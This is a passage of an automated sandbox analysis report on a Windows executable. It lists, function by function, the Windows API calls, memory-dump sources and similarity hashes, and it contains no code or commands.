                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                            • Opcode ID: d2f7fa5ff4b4776f4da6c52a28d2b1ba5cd6e4fccb50bc784e9c64c10a8df5c1
                                                                                                                                            • Instruction ID: 7a1ab12ab57fb8cd067cfc1748d7887e12d5ee72a90e977370dd369243f37fca
                                                                                                                                            • Opcode Fuzzy Hash: d2f7fa5ff4b4776f4da6c52a28d2b1ba5cd6e4fccb50bc784e9c64c10a8df5c1
                                                                                                                                            • Instruction Fuzzy Hash: 30118B7250560ABFDF1A5F908C58FEA7B69FF083A5F04011AFA0162160D731DC60EBA0
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue), ref: 00DF3418
                                                                                                                                            • GetLastError.KERNEL32(?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue,00E63260,FlsSetValue,00000000,00000364,?,00DF31B9), ref: 00DF3424
                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DF338D,00000364,00000000,00000000,00000000,?,00DF35FE,00000006,FlsSetValue,00E63260,FlsSetValue,00000000), ref: 00DF3432
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                            • Opcode ID: 16fab3f2bf8b9765f0f48623a17056e25fbe986b9c15733ee49ad127027dd735
                                                                                                                                            • Instruction ID: 5b2d48e443edf971d611f1f32ac602db45513e216d1f7dcfba63878fa0cb3999
                                                                                                                                            • Opcode Fuzzy Hash: 16fab3f2bf8b9765f0f48623a17056e25fbe986b9c15733ee49ad127027dd735
                                                                                                                                            • Instruction Fuzzy Hash: 1A01D83261532A9FCB328B7ADC449667B58BF04BA17174624FB06E3240C720DA45C6F0
                                                                                                                                            APIs
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BA8B
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BAB0
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BABA
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E2B69A,?,00008000), ref: 00E2BAED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                            • Opcode ID: 4f64fad37e020bf62c64137c97a319b120a64d182294ac77ca0028c4030b5a18
                                                                                                                                            • Instruction ID: 45196dfe96b88dcdfa0c58b978f87858ee3527edcff36816b0daebb6b9a89aa0
                                                                                                                                            • Opcode Fuzzy Hash: 4f64fad37e020bf62c64137c97a319b120a64d182294ac77ca0028c4030b5a18
                                                                                                                                            • Instruction Fuzzy Hash: 81118BB0C05A2DEBCF04DFA5E9486EEBB78FF09711F104095D981B2240CB308A54CBA1
                                                                                                                                            APIs
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E5888E
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00E588A6
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00E588CA
                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E588E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                            • Opcode ID: 4e90ed9e87ae7869134f66fc351bf6e3ef45a5ef805e44606f53197749c35be4
                                                                                                                                            • Instruction ID: c6a69b4009fed526e78325c001e04922f82db3e9ab87350518d64152a5082433
                                                                                                                                            • Opcode Fuzzy Hash: 4e90ed9e87ae7869134f66fc351bf6e3ef45a5ef805e44606f53197749c35be4
                                                                                                                                            • Instruction Fuzzy Hash: A31190B9D00209AFDB01CFA9C884AEEBBB4FB08311F408166E915F2210D770AA55CF51
                                                                                                                                            APIs
                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E23712
                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E23723
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E2372A
                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E23731
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                            • Opcode ID: a53cd6ec9a54625345ff89c4271c4780de1e3f83e74848a016ff3ff09790bf83
                                                                                                                                            • Instruction ID: ce14519ef7c49b0b9c0f35f56c32849781168a030042ae735b4dfb7a9cc0ef6e
                                                                                                                                            • Opcode Fuzzy Hash: a53cd6ec9a54625345ff89c4271c4780de1e3f83e74848a016ff3ff09790bf83
                                                                                                                                            • Instruction Fuzzy Hash: A7E039B11052247ADA3417A3AC4DEEB7E6CDB46BA2F000416B105E20809AA48945C6B1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC1F87
                                                                                                                                              • Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1F96
                                                                                                                                              • Part of subcall function 00DC1F2D: BeginPath.GDI32(?), ref: 00DC1FAD
                                                                                                                                              • Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1FD6
                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E592E3
                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00E592F0
                                                                                                                                            • EndPath.GDI32(?), ref: 00E59300
                                                                                                                                            • StrokePath.GDI32(?), ref: 00E5930E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                            • Opcode ID: 602d1d60b6341403fd74f471ae24b5fbb0be84a3af4a95f33db335d80ccbcfec
                                                                                                                                            • Instruction ID: e5b9f00accb5158a0228f376ba77186fa8069356ccabdc1c71ec0a9eeef88dce
                                                                                                                                            • Opcode Fuzzy Hash: 602d1d60b6341403fd74f471ae24b5fbb0be84a3af4a95f33db335d80ccbcfec
                                                                                                                                            • Instruction Fuzzy Hash: 69F05E36009359FEDB225F55AC0EFCE3F5AAF0A326F048405FB11710E2C77555299BA5
                                                                                                                                            APIs
                                                                                                                                            • GetSysColor.USER32(00000008), ref: 00DC21BC
                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00DC21C6
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00DC21D9
                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00DC21E1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                            • Opcode ID: 723b8aef6f6fd03633630a32d4e6662f75b302a07f33b5f40e321184f153a091
                                                                                                                                            • Instruction ID: 72cfcd104df2b1bf470443599248ca16e7f3cbecf4fc63b0e9cfd3ad7111deb1
                                                                                                                                            • Opcode Fuzzy Hash: 723b8aef6f6fd03633630a32d4e6662f75b302a07f33b5f40e321184f153a091
                                                                                                                                            • Instruction Fuzzy Hash: E3E06531244740AEDB315B75BC09BE83B11AB11336F048619F7F5A40E0C77246849B11
                                                                                                                                            APIs
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E1EC36
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E1EC40
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1EC60
                                                                                                                                            • ReleaseDC.USER32(?), ref: 00E1EC81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                            • Opcode ID: c8de4b91fc8f90748427ad2fdf3ae475839a3576d94f2dedb6ec3436a9696f38
                                                                                                                                            • Instruction ID: a65cb3078c994b7b4a45f6b4e1080d561cde82edbe235d66d168b2485edcd936
                                                                                                                                            • Opcode Fuzzy Hash: c8de4b91fc8f90748427ad2fdf3ae475839a3576d94f2dedb6ec3436a9696f38
                                                                                                                                            • Instruction Fuzzy Hash: 6EE01AB0804304DFCB55AFA1CD48A5DBBB1EB08312F108809F84AF3350C7785946DF10
                                                                                                                                            APIs
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E1EC4A
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E1EC54
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1EC60
                                                                                                                                            • ReleaseDC.USER32(?), ref: 00E1EC81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                            • Opcode ID: 4ee2928e94509f7b1ae28c97156d913b17f8c3b3347862f547be02fd9cf0ec83
                                                                                                                                            • Instruction ID: e69205fac20f3c65b6aaad6f6eea55e6aa166169fe584ab31c668eed3e1cf316
                                                                                                                                            • Opcode Fuzzy Hash: 4ee2928e94509f7b1ae28c97156d913b17f8c3b3347862f547be02fd9cf0ec83
                                                                                                                                            • Instruction Fuzzy Hash: 6FE01AB0C04304DFCB65AFA1CD48A5DBBB1EB08312B108809E84AF3250C7786906DF10
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LoadString
                                                                                                                                            • String ID: @COM_EVENTOBJ$bn
                                                                                                                                            • API String ID: 2948472770-192135924
                                                                                                                                            • Opcode ID: 25800c3b778772529c3d9b2c5098c5c1c9e2130537ed1eb7765dde062f2e7f8e
                                                                                                                                            • Instruction ID: d7ad78cb98944662ffc095084ef2042486373dee30d9a5bcaa00ae3e5564c3b2
                                                                                                                                            • Opcode Fuzzy Hash: 25800c3b778772529c3d9b2c5098c5c1c9e2130537ed1eb7765dde062f2e7f8e
                                                                                                                                            • Instruction Fuzzy Hash: A6F1A0706083419FD724DF24C841BAAB7E0FF84718F14991DF58AAB2A1D771EE85CB92
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DE05B2: EnterCriticalSection.KERNEL32(00E9170C,?,00000000,?,00DCD22A,00E93570,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?), ref: 00DE05BD
                                                                                                                                              • Part of subcall function 00DE05B2: LeaveCriticalSection.KERNEL32(00E9170C,?,00DCD22A,00E93570,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?,00000001,00E92430), ref: 00DE05FA
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00DE0413: __onexit.LIBCMT ref: 00DE0419
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00E48658
                                                                                                                                              • Part of subcall function 00DE0568: EnterCriticalSection.KERNEL32(00E9170C,00000000,?,00DCD258,00E93570,00E027C9,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?), ref: 00DE0572
                                                                                                                                              • Part of subcall function 00DE0568: LeaveCriticalSection.KERNEL32(00E9170C,?,00DCD258,00E93570,00E027C9,00000001,00000000,?,?,00E3F023,?,?,00000000,00000001,?,00000001), ref: 00DE05A5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                            • String ID: Variable must be of type 'Object'.$bn
                                                                                                                                            • API String ID: 535116098-2837176596
                                                                                                                                            • Opcode ID: b0c6809ad80b5453b89d24a9f79979e2d53eccd10c073ff4048ebfaaf85b63b5
                                                                                                                                            • Instruction ID: f2ef5a14f535c1a79654b3c31336c669a40d4c401eaf1b3b3e4ab6cbfb621c83
                                                                                                                                            • Opcode Fuzzy Hash: b0c6809ad80b5453b89d24a9f79979e2d53eccd10c073ff4048ebfaaf85b63b5
                                                                                                                                            • Instruction Fuzzy Hash: 40917C74A00209EFCB04EF54E995DADBBB1FF48304F50905AF906BB292DB71AE45CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF
                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E35919
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                            • String ID: *$LPT
                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                            • Opcode ID: 934d975353d3879ab4d4ec40707c72e7e34f20f16f7aece05c50a0fa33924b26
                                                                                                                                            • Instruction ID: a54706ce517e75f2373c9107d842bdc173107b4dedd8de0a679638937e5cc5b4
                                                                                                                                            • Opcode Fuzzy Hash: 934d975353d3879ab4d4ec40707c72e7e34f20f16f7aece05c50a0fa33924b26
                                                                                                                                            • Instruction Fuzzy Hash: FA918076A00604DFCB14DF54C498EA9BBF5EF44318F199099E84AAF352C771EE85CBA0
                                                                                                                                            APIs
                                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00E258AF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ContainedObject
                                                                                                                                            • String ID: 0$$Container
                                                                                                                                            • API String ID: 3565006973-836522788
                                                                                                                                            • Opcode ID: db417e6d5abc861e8d3a0c4f9944c3d6b242081f50dfb1d206ba68873c0e2cf3
                                                                                                                                            • Instruction ID: 44214c95a3bbc4d23c50d5dd00c3b513012b81b3ddcb8c8b77765614ed65f645
                                                                                                                                            • Opcode Fuzzy Hash: db417e6d5abc861e8d3a0c4f9944c3d6b242081f50dfb1d206ba68873c0e2cf3
                                                                                                                                            • Instruction Fuzzy Hash: 6E815871200611EFDB14DF64C984A6ABBF4FF48714F10856EF94AEB291DBB0E841CB60
                                                                                                                                            APIs
                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00DEE67D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                            • String ID: pow
                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                            • Opcode ID: 5c56994e9dbc0958f7fd433fe70ee3cbcb5f956fea8cbac524131c4dbf4b15f1
                                                                                                                                            • Instruction ID: 70817bb983fdbe0805b1db199be5035db97db2d740f3011084636f9edfe9502e
                                                                                                                                            • Opcode Fuzzy Hash: 5c56994e9dbc0958f7fd433fe70ee3cbcb5f956fea8cbac524131c4dbf4b15f1
                                                                                                                                            • Instruction Fuzzy Hash: 94517961E0824A8ACB117716DD013BB2BA0EB50740F29CE5CF1D5462E8EF358C85AA77
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #
                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                            • Opcode ID: 3de1400e7ca27508cec9c195a754f43d5d6efcfd269fcdb06f5bfb408c7c2ba8
                                                                                                                                            • Instruction ID: 6df38f83c661f0736904da2e6c092a5129b3fbb77e3dc0ccca3d90e1e692bd1d
                                                                                                                                            • Opcode Fuzzy Hash: 3de1400e7ca27508cec9c195a754f43d5d6efcfd269fcdb06f5bfb408c7c2ba8
                                                                                                                                            • Instruction Fuzzy Hash: 7E51ED359052479FCB25DF28C451AEA7BA4EF15314FA4805AF8A2AB290DF349D82CB71
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00DDF6DB
                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DDF6F4
                                                                                                                                            Strings
